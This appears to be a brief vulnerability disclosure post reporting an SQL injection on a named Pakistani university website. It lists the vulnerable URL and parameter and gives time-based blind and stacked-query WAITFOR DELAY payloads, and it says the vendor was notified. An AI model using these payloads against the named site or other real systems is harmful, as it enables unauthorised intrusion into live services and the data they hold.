http://www.aiou.edu.pk – sql vulnerability

www.hu.edu.pk – Sql Vulnerability
July 26, 2016
www.ogra.org.pk/ – (Error Based Injection)
July 26, 2016

http://www.aiou.edu.pk – sql vulnerability

Allama Iqbal Open University

website : http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)

vuln type : sql injection

submitted by : Waqas Haider

Poc :

Parameter: dt (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: dt=1;WAITFOR DELAY '0:0:5'–

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: dt=1 WAITFOR DELAY '0:0:5'

Notification : Vendor Notified

Leave a Reply